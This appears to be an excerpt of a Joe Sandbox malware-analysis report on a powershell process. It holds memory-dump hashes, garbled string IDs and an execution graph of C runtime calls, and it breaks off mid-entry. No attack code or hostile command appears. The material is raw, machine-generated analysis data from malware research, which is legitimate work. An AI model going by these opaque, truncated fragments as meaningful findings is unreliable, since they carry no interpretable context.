                                                                                                          • Opcode Fuzzy Hash: 2b14f1e6c21e1a097eccb077d180957e2790c2955c4197dcf641e9efe5306a9e
                                                                                                          • Instruction Fuzzy Hash: B5A149B1B34217CFCB258A79D85866A7BE2BF85210F24807BD905CB681DF35D9C1C7A2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (f1l$(f1l$(f1l$(f1l$4'dq$4'dq$4.l$4.l$tL#k
                                                                                                          • API String ID: 0-275879156
                                                                                                          • Opcode ID: 26eff2c9019ce88488acbe4733a42ceefd4224fb18d7742b3378bae63451ba7f
                                                                                                          • Instruction ID: 5ce9c47b20f6a11f2c997d14d236c1295be2392ed137470d4ae2ddc8f791f846
                                                                                                          • Opcode Fuzzy Hash: 26eff2c9019ce88488acbe4733a42ceefd4224fb18d7742b3378bae63451ba7f
                                                                                                          • Instruction Fuzzy Hash: 6061A4B8F202068FCB14CBA8C459A6ABBE3BF88714F25C46AD5059B751CF35DC81CB91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: T!k$4'dq$4'dq$XY1l$XY1l$tPdq$tPdq
                                                                                                          • API String ID: 0-3321339072
                                                                                                          • Opcode ID: 0b26c8a7eb39b8643c053a43e0c265f13b7d2b94102891ed7fb2e72c470b610a
                                                                                                          • Instruction ID: 5d742f54500ad4898b840f84d68181af939cca3d2997a436d8df109fe3a56c01
                                                                                                          • Opcode Fuzzy Hash: 0b26c8a7eb39b8643c053a43e0c265f13b7d2b94102891ed7fb2e72c470b610a
                                                                                                          • Instruction Fuzzy Hash: E7D16BB17243568FCB358B68C858E6BBBA2AF86315F14C0ABD505CB291DB71C8C1D7A1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$4'dq$t~wq$$dq$$dq$$dq
                                                                                                          • API String ID: 0-1268362705
                                                                                                          • Opcode ID: 70c4842d8591a719bfb62c4b89826ce65a745fada65c7f0e1d18a337522e4941
                                                                                                          • Instruction ID: 56f7a99a91a321ca9f8b71ef9d38b6b9d1d7856203b0033094714f0d7ff168ab
                                                                                                          • Opcode Fuzzy Hash: 70c4842d8591a719bfb62c4b89826ce65a745fada65c7f0e1d18a337522e4941
                                                                                                          • Instruction Fuzzy Hash: 034168B572034F8BCB285AA9585827AB792AF85315F24816BD9018B181DF35D9E1C392
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$84/l$d%jq$d%jq$d%jq$tPdq
                                                                                                          • API String ID: 0-1155202957
                                                                                                          • Opcode ID: c430c46da78e8c79fdf21b7692a630a391c0e96425b5b08549ec723c7e12a64b
                                                                                                          • Instruction ID: 51081dff32f0d79783017f635be7be4697ab46c0a3fc89806495a5b46c50361e
                                                                                                          • Opcode Fuzzy Hash: c430c46da78e8c79fdf21b7692a630a391c0e96425b5b08549ec723c7e12a64b
                                                                                                          • Instruction Fuzzy Hash: A231C7B4B20216DFC714EF58C454A6AFBB2BB4C710F148156E945AB350C771ECC1CBA4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$4'dq$4'dq$4'dq$`B#k
                                                                                                          • API String ID: 0-3635183912
                                                                                                          • Opcode ID: f519168a3783276d05a95ab02a2f0074b2be9302eaac1e3ab012b05c31a3f3aa
                                                                                                          • Instruction ID: 38790709de83949266cb2e4ec78495fc1bfe69ef0693fece7ebc9d0469ecb9b7
                                                                                                          • Opcode Fuzzy Hash: f519168a3783276d05a95ab02a2f0074b2be9302eaac1e3ab012b05c31a3f3aa
                                                                                                          • Instruction Fuzzy Hash: EC12C0B1B202199FD754CB98C485B9ABBF2BF85704F14C06AE905AF741CB72ED81CB91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (f1l$(f1l$4'dq$4.l$tL#k
                                                                                                          • API String ID: 0-3982030779
                                                                                                          • Opcode ID: 3709c1581c15ef95a85d95085d0ca1cd69cb4ae2ee7cd5a6baf5d0572d0e6c8b
                                                                                                          • Instruction ID: 09afb6cc95d08987616097f1afb19ad879677f0bd97c5479ea1de0624ad13d95
                                                                                                          • Opcode Fuzzy Hash: 3709c1581c15ef95a85d95085d0ca1cd69cb4ae2ee7cd5a6baf5d0572d0e6c8b
                                                                                                          • Instruction Fuzzy Hash: CC51D5B8E20206DFCB15CF58C449A6ABBF3BF89714F19C46AD401AB751CB36E881CB51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$4'dq$$dq$$dq$$dq
                                                                                                          • API String ID: 0-2509493698
                                                                                                          • Opcode ID: 736b8d2f6a4d4a4f45161956e25d5912391a1c20bcb8db4c24c20516a963ea1a
                                                                                                          • Instruction ID: 38d01e587f2abf0fb16dd1a2c70aaba75f4da2798a24a9423f6bc9b80469510d
                                                                                                          • Opcode Fuzzy Hash: 736b8d2f6a4d4a4f45161956e25d5912391a1c20bcb8db4c24c20516a963ea1a
                                                                                                          • Instruction Fuzzy Hash: 634199F6734257CFCF256AA99868276B7A1AFC6120B2480BBC5D1C6281DF35E5C1C370
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 84/l$XRiq$XRiq$tPdq$$dq
                                                                                                          • API String ID: 0-2751540829
                                                                                                          • Opcode ID: d829b4dce7acd1e6830c9889da9e5a172937836f313c157482ef0aa411c73873
                                                                                                          • Instruction ID: 60dcd3d4cb178c3d672cd099af1c1cb049b7d47e6beb6041b4b63ee92add1b91
                                                                                                          • Opcode Fuzzy Hash: d829b4dce7acd1e6830c9889da9e5a172937836f313c157482ef0aa411c73873
                                                                                                          • Instruction Fuzzy Hash: A84172B8B2024ADBCF28DE15C548A6AB7F2BF44710F29C09BE8156B295C771DDC0CB91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$4'dq$$dq$$dq$$dq
                                                                                                          • API String ID: 0-2509493698
                                                                                                          • Opcode ID: d144de7be8146a6638e46273ddd532e17d6fc8376fd560d28c0a7029ed7fe9c7
                                                                                                          • Instruction ID: 39f114606e2c290077d0784c734a3837b7ab99144d0f551bfbf8e70ae3514d64
                                                                                                          • Opcode Fuzzy Hash: d144de7be8146a6638e46273ddd532e17d6fc8376fd560d28c0a7029ed7fe9c7
                                                                                                          • Instruction Fuzzy Hash: 1F3124B6B34287CFCB256A65944917BBBA2AFC1251B34807BC88187581DB31C7E1C751
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$tPdq$$dq$$dq$$dq
                                                                                                          • API String ID: 0-3100050110
                                                                                                          • Opcode ID: 350ba7ed9583516c343694ac875bffe4dcf909a7d4bcaa76287514e92097ced2
                                                                                                          • Instruction ID: ab330fcba4812188d0fb70250439df277842164c7d5781728cd9b4b1ba1b756d
                                                                                                          • Opcode Fuzzy Hash: 350ba7ed9583516c343694ac875bffe4dcf909a7d4bcaa76287514e92097ced2
                                                                                                          • Instruction Fuzzy Hash: 8B31C5F1A30207EFDB248E05C548BAAB7A2AB45324F15C16FD9156B298DBB1D9C0CF91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $dq$$dq$$dq$'l$'l
                                                                                                          • API String ID: 0-4111611248
                                                                                                          • Opcode ID: 5541475abce3c22a1c08418d850958e43d7362727a52291b2084e27f0f9576cf
                                                                                                          • Instruction ID: 045a64e97900aeb136ee48e1fd4bb974e78ec8bc8f8fdc81ad670e0f7ad5b2d2
                                                                                                          • Opcode Fuzzy Hash: 5541475abce3c22a1c08418d850958e43d7362727a52291b2084e27f0f9576cf
                                                                                                          • Instruction Fuzzy Hash: 7511E9F172034BABDB34596AD84976BB7E7EBC1721F34802BA949C7280CA71C9C1C760
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 84/l$84/l$tPdq$tPdq
                                                                                                          • API String ID: 0-513161371
                                                                                                          • Opcode ID: 5f92ec31b9b4ed6d23756c68fe0284832e1be91c224c8e02d7800e135d76e072
                                                                                                          • Instruction ID: 3c563d4a19a3ad7dc477aecddef588abd8aa7f50e7b0e141cf0e56897fe1eadb
                                                                                                          • Opcode Fuzzy Hash: 5f92ec31b9b4ed6d23756c68fe0284832e1be91c224c8e02d7800e135d76e072
                                                                                                          • Instruction Fuzzy Hash: AE917DB5B202869FCB14AF698454B6BBBE2AFC5310F14846BD945DB280CA71DA80C7A1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (f1l$(f1l$(f1l$(f1l
                                                                                                          • API String ID: 0-1015051784
                                                                                                          • Opcode ID: 7ab236c810986b4d2901a9dc8890be5805ced8f9aa39692b0ec3ae079d20105f
                                                                                                          • Instruction ID: ff9a6a9cb552f4d33e198120d2e21881a6f81cdab726c1a6f915b5634fc52a61
                                                                                                          • Opcode Fuzzy Hash: 7ab236c810986b4d2901a9dc8890be5805ced8f9aa39692b0ec3ae079d20105f
                                                                                                          • Instruction Fuzzy Hash: 04718FB4A20206CFCB14CF98D485A6EBBF2EF89314F14816AD905AB751CB76DC81CF91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $dq$$dq$$dq$$dq
                                                                                                          • API String ID: 0-185584874
                                                                                                          • Opcode ID: eeb15b3bab10e3267e81ced4a2c22283d975449970275e6dd1f73e6a5e82137a
                                                                                                          • Instruction ID: af3cf3528a19264d3bd60cdd11f196cadd10ac038e04e8e577ba90b37223efc6
                                                                                                          • Opcode Fuzzy Hash: eeb15b3bab10e3267e81ced4a2c22283d975449970275e6dd1f73e6a5e82137a
                                                                                                          • Instruction Fuzzy Hash: D82149B133024F6BDB24897E8845B27BAD6DBC5716F20843BEA05CB381CD75E891C361
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2053271921.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_7260000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'dq$4'dq$$dq$$dq
                                                                                                          • API String ID: 0-4229963660
                                                                                                          • Opcode ID: d23fee0176461412081e7a3d84a05c2b434b33683e04159a15715238860fda5b
                                                                                                          • Instruction ID: 65da217bb6d32d1a377e47ff8107408b5f08bbda4e3ef8aa1a2b9c5304af47de
                                                                                                          • Opcode Fuzzy Hash: d23fee0176461412081e7a3d84a05c2b434b33683e04159a15715238860fda5b
                                                                                                          • Instruction Fuzzy Hash: E201F761B2E3DA4FC72B667828255A37FB29FC351072A00DBD481CB6D2DD544E45C3A2

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:1.8%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:2%
                                                                                                          Total number of Nodes:1643
                                                                                                          Total number of Limit Nodes:1
                                                                                                          execution_graph 6261 1fc77bc7 6262 1fc77bd3 ___DestructExceptionObject 6261->6262 6263 1fc77c0a _abort 6262->6263 6269 1fc75671 RtlEnterCriticalSection 6262->6269 6265 1fc77be7 6270 1fc77f86 6265->6270 6269->6265 6271 1fc77f94 __fassign 6270->6271 6273 1fc77bf7 6270->6273 6271->6273 6277 1fc77cc2 6271->6277 6274 1fc77c10 6273->6274 6391 1fc756b9 RtlLeaveCriticalSection 6274->6391 6276 1fc77c17 6276->6263 6279 1fc77d42 6277->6279 6280 1fc77cd8 6277->6280 6281 1fc7571e _free 20 API calls 6279->6281 6303 1fc77d90 6279->6303 6280->6279 6285 1fc7571e _free 20 API calls 6280->6285 6287 1fc77d0b 6280->6287 6282 1fc77d64 6281->6282 6283 1fc7571e _free 20 API calls 6282->6283 6288 1fc77d77 6283->6288 6284 1fc7571e _free 20 API calls 6289 1fc77d37 6284->6289 6291 1fc77d00 6285->6291 6286 1fc77d9e 6290 1fc77dfe 6286->6290 6304 1fc7571e 20 API calls _free 6286->6304 6292 1fc7571e _free 20 API calls 6287->6292 6302 1fc77d2d 6287->6302 6293 1fc7571e _free 20 API calls 6288->6293 6296 1fc7571e _free 20 API calls 6289->6296 6297 1fc7571e _free 20 API calls 6290->6297 6305 1fc790ba 6291->6305 6294 1fc77d22 6292->6294 6295 1fc77d85 6293->6295 6333 1fc791b8 6294->6333 6300 1fc7571e _free 20 API calls 6295->6300 6296->6279 6301 1fc77e04 6297->6301 6300->6303 6301->6273 6302->6284 6345 1fc77e35 6303->6345 6304->6286 6306 1fc790cb 6305->6306 6332 1fc791b4 6305->6332 6307 1fc7571e _free 20 API calls 6306->6307 6308 1fc790dc 6306->6308 6307->6308 6309 1fc7571e _free 20 API calls 6308->6309 6311 1fc790ee 6308->6311 6309->6311 6310 1fc79100 6313 1fc79112 6310->6313 6315 1fc7571e _free 20 API calls 6310->6315 6311->6310 6312 1fc7571e _free 20 API calls 6311->6312 6312->6310 6314 1fc79124 6313->6314 6316 1fc7571e _free 20 API calls 6313->6316 6317 1fc79136 6314->6317 6318 1fc7571e _free 20 API calls 6314->6318 6315->6313 6316->6314 6319 1fc79148 6317->6319 6320 1fc7571e _free 20 API calls 6317->6320 6318->6317 6321 1fc7915a 6319->6321 6323 1fc7571e _free 20 API calls 6319->6323 6320->6319 6322 1fc7916c 6321->6322 6324 1fc7571e _free 20 API calls 6321->6324 6325 1fc7917e 6322->6325 6326 1fc7571e _free 20 API calls 6322->6326 6323->6321 6324->6322 6327 1fc79190 6325->6327 6328 1fc7571e _free 20 API calls 6325->6328 6326->6325 6329 1fc791a2 6327->6329 6330 1fc7571e _free 20 API calls 6327->6330 6328->6327 6331 1fc7571e _free 20 API calls 6329->6331 6329->6332 6330->6329 6331->6332 6332->6287 6334 1fc791c5 6333->6334 6344 1fc7921d 6333->6344 6335 1fc791d5 6334->6335 6336 1fc7571e _free 20 API calls 6334->6336 6337 1fc791e7 6335->6337 6338 1fc7571e _free 20 API calls 6335->6338 6336->6335 6339 1fc7571e _free 20 API calls 6337->6339 6340 1fc791f9 6337->6340 6338->6337 6339->6340 6341 1fc7920b 6340->6341 6342 1fc7571e _free 20 API calls 6340->6342 6343 1fc7571e _free 20 API calls 6341->6343 6341->6344 6342->6341 6343->6344 6344->6302 6346 1fc77e60 6345->6346 6347 1fc77e42 6345->6347 6346->6286 6347->6346 6351 1fc7925d 6347->6351 6350 1fc7571e _free 20 API calls 6350->6346 6352 1fc77e5a 6351->6352 6353 1fc7926e 6351->6353 6352->6350 6387 1fc79221 6353->6387 6356 1fc79221 __fassign 20 API calls 6357 1fc79281 6356->6357 6358 1fc79221 __fassign 20 API calls 6357->6358 6359 1fc7928c 6358->6359 6360 1fc79221 __fassign 20 API calls 6359->6360 6361 1fc79297 6360->6361 6362 1fc79221 __fassign 20 API calls 6361->6362 6363 1fc792a5 6362->6363 6364 1fc7571e _free 20 API calls 6363->6364 6365 1fc792b0 6364->6365 6366 1fc7571e _free 20 API calls 6365->6366 6367 1fc792bb 6366->6367 6368 1fc7571e _free 20 API calls 6367->6368 6369 1fc792c6 6368->6369 6370 1fc79221 __fassign 20 API calls 6369->6370 6371 1fc792d4 6370->6371 6372 1fc79221 __fassign 20 API calls 6371->6372 6373 1fc792e2 6372->6373 6374 1fc79221 __fassign 20 API calls 6373->6374 6375 1fc792f3 6374->6375 6376 1fc79221 __fassign 20 API calls 6375->6376 6377 1fc79301 6376->6377 6378 1fc79221 __fassign 20 API calls 6377->6378 6379 1fc7930f 6378->6379 6380 1fc7571e _free 20 API calls 6379->6380 6381 1fc7931a 6380->6381 6382 1fc7571e _free 20 API calls 6381->6382 6383 1fc79325 6382->6383 6384 1fc7571e _free 20 API calls 6383->6384 6385 1fc79330 6384->6385 6386 1fc7571e _free 20 API calls 6385->6386 6386->6352 6388 1fc79258 6387->6388 6389 1fc79248 6387->6389 6388->6356 6389->6388 6390 1fc7571e _free 20 API calls 6389->6390 6390->6389 6391->6276 6392 1fc7a1c6 IsProcessorFeaturePresent 7026 1fc7a945 7030 1fc7a96d 7026->7030 7027 1fc7a9a5 7028 1fc7a997 7035 1fc7aa17 7028->7035 7029 1fc7a99e 7039 1fc7aa00 7029->7039 7030->7027 7030->7028 7030->7029 7036 1fc7aa20 7035->7036 7043 1fc7b19b 7036->7043 7040 1fc7aa20 7039->7040 7041 1fc7b19b __startOneArgErrorHandling 21 API calls 7040->7041 7042 1fc7a9a3 7041->7042 7044 1fc7b1da __startOneArgErrorHandling 7043->7044 7048 1fc7b25c __startOneArgErrorHandling 7044->7048 7053 1fc7b59e 7044->7053 7047 1fc7b292 7049 1fc72ada _ValidateLocalCookies 5 API calls 7047->7049 7052 1fc7b286 7048->7052 7056 1fc778a3 7048->7056 7051 1fc7a99c 7049->7051 7052->7047 7060 1fc7b8b2 7052->7060 7067 1fc7b5c1 7053->7067 7059 1fc778cb 7056->7059 7057 1fc72ada _ValidateLocalCookies 5 API calls 7058 1fc778e8 7057->7058 7058->7052 7059->7057 7061 1fc7b8d4 7060->7061 7062 1fc7b8bf 7060->7062 7064 1fc76368 _free 20 API calls 7061->7064 7063 1fc7b8d9 7062->7063 7065 1fc76368 _free 20 API calls 7062->7065 7063->7047 7064->7063 7066 1fc7b8cc 7065->7066 7066->7047 7068 1fc7b5ec __raise_exc 7067->7068 7069 1fc7b7e5 RaiseException 7068->7069 7070 1fc7b5bc 7069->7070 7070->7048 7071 1fc7af43 7072 1fc7af4d 7071->7072 7073 1fc7af59 7071->7073 7072->7073 7074 1fc7af52 CloseHandle 7072->7074 7074->7073 7879 1fc78640 7882 1fc78657 7879->7882 7883 1fc78665 7882->7883 7884 1fc78679 7882->7884 7887 1fc76368 _free 20 API calls 7883->7887 7885 1fc78693 7884->7885 7886 1fc78681 7884->7886 7892 1fc754a7 __fassign 38 API calls 7885->7892 7894 1fc78652 7885->7894 7888 1fc76368 _free 20 API calls 7886->7888 7889 1fc7866a 7887->7889 7891 1fc78686 7888->7891 7890 1fc762ac ___std_exception_copy 26 API calls 7889->7890 7890->7894 7893 1fc762ac ___std_exception_copy 26 API calls 7891->7893 7892->7894 7893->7894 7895 1fc7284f 7898 1fc72882 7895->7898 7901 1fc73550 7898->7901 7900 1fc7285d 7902 1fc7358a 7901->7902 7903 1fc7355d 7901->7903 7902->7900 7903->7902 7904 1fc747e5 ___std_exception_copy 21 API calls 7903->7904 7905 1fc7357a 7904->7905 7905->7902 7906 1fc7544d ___std_exception_copy 26 API calls 7905->7906 7906->7902 7907 1fc7724e GetProcessHeap 7908 1fc72049 7910 1fc72055 ___DestructExceptionObject 7908->7910 7909 1fc7205e 7910->7909 7911 1fc720d3 7910->7911 7912 1fc7207d 7910->7912 7913 1fc72639 ___scrt_fastfail 4 API calls 7911->7913 7922 1fc7244c 7912->7922 7915 1fc720da 7913->7915 7916 1fc72082 7931 1fc72308 7916->7931 7918 1fc72087 __RTC_Initialize 7934 1fc720c4 7918->7934 7920 1fc7209f 7937 1fc7260b 7920->7937 7923 1fc72451 ___scrt_release_startup_lock 7922->7923 7924 1fc72455 7923->7924 7927 1fc72461 7923->7927 7925 1fc7527a _abort 20 API calls 7924->7925 7926 1fc7245f 7925->7926 7926->7916 7928 1fc7246e 7927->7928 7929 1fc7499b _abort 28 API calls 7927->7929 7928->7916 7930 1fc74bbd 7929->7930 7930->7916 7943 1fc734c7 RtlInterlockedFlushSList 7931->7943 7933 1fc72312 7933->7918 7945 1fc7246f 7934->7945 7936 1fc720c9 ___scrt_release_startup_lock 7936->7920 7938 1fc72617 7937->7938 7939 1fc7262d 7938->7939 7953 1fc753ed 7938->7953 7939->7909 7942 1fc73529 ___vcrt_uninitialize 8 API calls 7942->7939 7944 1fc734d7 7943->7944 7944->7933 7950 1fc753ff 7945->7950 7948 1fc7391b ___vcrt_uninitialize_ptd 6 API calls 7949 1fc7354d 7948->7949 7949->7936 7951 1fc75c2b 11 API calls 7950->7951 7952 1fc72476 7951->7952 7952->7948 7956 1fc774da 7953->7956 7958 1fc774f3 7956->7958 7957 1fc72ada _ValidateLocalCookies 5 API calls 7959 1fc72625 7957->7959 7958->7957 7959->7942 7075 1fc75348 7078 1fc73529 7075->7078 7079 1fc73532 7078->7079 7085 1fc73543 7078->7085 7086 1fc7391b 7079->7086 7087 1fc73925 7086->7087 7088 1fc73537 7086->7088 7098 1fc73b2c 7087->7098 7090 1fc73972 7088->7090 7091 1fc7353c 7090->7091 7092 1fc7397d 7090->7092 7094 1fc73c50 7091->7094 7093 1fc73987 RtlDeleteCriticalSection 7092->7093 7093->7091 7093->7093 7095 1fc73c7f 7094->7095 7096 1fc73c59 7094->7096 7095->7085 7096->7095 7097 1fc73c69 FreeLibrary 7096->7097 7097->7096 7103 1fc73a82 7098->7103 7100 1fc73b46 7101 1fc73b5e TlsFree 7100->7101 7102 1fc73b52 7100->7102 7101->7102 7102->7088 7104 1fc73aaa 7103->7104 7108 1fc73aa6 __crt_fast_encode_pointer 7103->7108 7104->7108 7109 1fc739be 7104->7109 7107 1fc73ac4 GetProcAddress 7107->7108 7108->7100 7111 1fc739cd try_get_first_available_module 7109->7111 7110 1fc73a77 7110->7107 7110->7108 7111->7110 7112 1fc739ea LoadLibraryExW 7111->7112 7114 1fc73a60 FreeLibrary 7111->7114 7115 1fc73a38 LoadLibraryExW 7111->7115 7112->7111 7113 1fc73a05 GetLastError 7112->7113 7113->7111 7114->7111 7115->7111 7116 1fc77b48 7126 1fc78ebf 7116->7126 7120 1fc77b55 7139 1fc7907c 7120->7139 7123 1fc77b7f 7124 1fc7571e _free 20 API calls 7123->7124 7125 1fc77b8a 7124->7125 7143 1fc78ec8 7126->7143 7128 1fc77b50 7129 1fc78fdc 7128->7129 7130 1fc78fe8 ___DestructExceptionObject 7129->7130 7163 1fc75671 RtlEnterCriticalSection 7130->7163 7132 1fc78ff3 7133 1fc7905e 7132->7133 7135 1fc79032 RtlDeleteCriticalSection 7132->7135 7164 1fc7a09c 7132->7164 7177 1fc79073 7133->7177 7136 1fc7571e _free 20 API calls 7135->7136 7136->7132 7137 1fc7906a _abort 7137->7120 7140 1fc77b64 RtlDeleteCriticalSection 7139->7140 7141 1fc79092 7139->7141 7140->7120 7140->7123 7141->7140 7142 1fc7571e _free 20 API calls 7141->7142 7142->7140 7144 1fc78ed4 ___DestructExceptionObject 7143->7144 7153 1fc75671 RtlEnterCriticalSection 7144->7153 7146 1fc78f77 7158 1fc78f97 7146->7158 7149 1fc78f83 _abort 7149->7128 7151 1fc78ee3 7151->7146 7152 1fc78e78 66 API calls 7151->7152 7154 1fc77b94 RtlEnterCriticalSection 7151->7154 7155 1fc78f6d 7151->7155 7152->7151 7153->7151 7154->7151 7161 1fc77ba8 RtlLeaveCriticalSection 7155->7161 7157 1fc78f75 7157->7151 7162 1fc756b9 RtlLeaveCriticalSection 7158->7162 7160 1fc78f9e 7160->7149 7161->7157 7162->7160 7163->7132 7165 1fc7a0a8 ___DestructExceptionObject 7164->7165 7166 1fc7a0ce 7165->7166 7167 1fc7a0b9 7165->7167 7176 1fc7a0c9 _abort 7166->7176 7180 1fc77b94 RtlEnterCriticalSection 7166->7180 7168 1fc76368 _free 20 API calls 7167->7168 7169 1fc7a0be 7168->7169 7171 1fc762ac ___std_exception_copy 26 API calls 7169->7171 7171->7176 7172 1fc7a0ea 7181 1fc7a026 7172->7181 7174 1fc7a0f5 7197 1fc7a112 7174->7197 7176->7132 7445 1fc756b9 RtlLeaveCriticalSection 7177->7445 7179 1fc7907a 7179->7137 7180->7172 7182 1fc7a033 7181->7182 7183 1fc7a048 7181->7183 7184 1fc76368 _free 20 API calls 7182->7184 7189 1fc7a043 7183->7189 7200 1fc78e12 7183->7200 7186 1fc7a038 7184->7186 7188 1fc762ac ___std_exception_copy 26 API calls 7186->7188 7188->7189 7189->7174 7190 1fc7907c 20 API calls 7191 1fc7a064 7190->7191 7206 1fc77a5a 7191->7206 7193 1fc7a06a 7213 1fc7adce 7193->7213 7196 1fc7571e _free 20 API calls 7196->7189 7444 1fc77ba8 RtlLeaveCriticalSection 7197->7444 7199 1fc7a11a 7199->7176 7201 1fc78e2a 7200->7201 7202 1fc78e26 7200->7202 7201->7202 7203 1fc77a5a 26 API calls 7201->7203 7202->7190 7204 1fc78e4a 7203->7204 7228 1fc79a22 7204->7228 7207 1fc77a66 7206->7207 7208 1fc77a7b 7206->7208 7209 1fc76368 _free 20 API calls 7207->7209 7208->7193 7210 1fc77a6b 7209->7210 7211 1fc762ac ___std_exception_copy 26 API calls 7210->7211 7212 1fc77a76 7211->7212 7212->7193 7214 1fc7adf2 7213->7214 7215 1fc7addd 7213->7215 7216 1fc7ae2d 7214->7216 7220 1fc7ae19 7214->7220 7217 1fc76355 __dosmaperr 20 API calls 7215->7217 7218 1fc76355 __dosmaperr 20 API calls 7216->7218 7219 1fc7ade2 7217->7219 7221 1fc7ae32 7218->7221 7222 1fc76368 _free 20 API calls 7219->7222 7401 1fc7ada6 7220->7401 7224 1fc76368 _free 20 API calls 7221->7224 7225 1fc7a070 7222->7225 7226 1fc7ae3a 7224->7226 7225->7189 7225->7196 7227 1fc762ac ___std_exception_copy 26 API calls 7226->7227 7227->7225 7229 1fc79a2e ___DestructExceptionObject 7228->7229 7230 1fc79a36 7229->7230 7231 1fc79a4e 7229->7231 7253 1fc76355 7230->7253 7233 1fc79aec 7231->7233 7237 1fc79a83 7231->7237 7235 1fc76355 __dosmaperr 20 API calls 7233->7235 7238 1fc79af1 7235->7238 7236 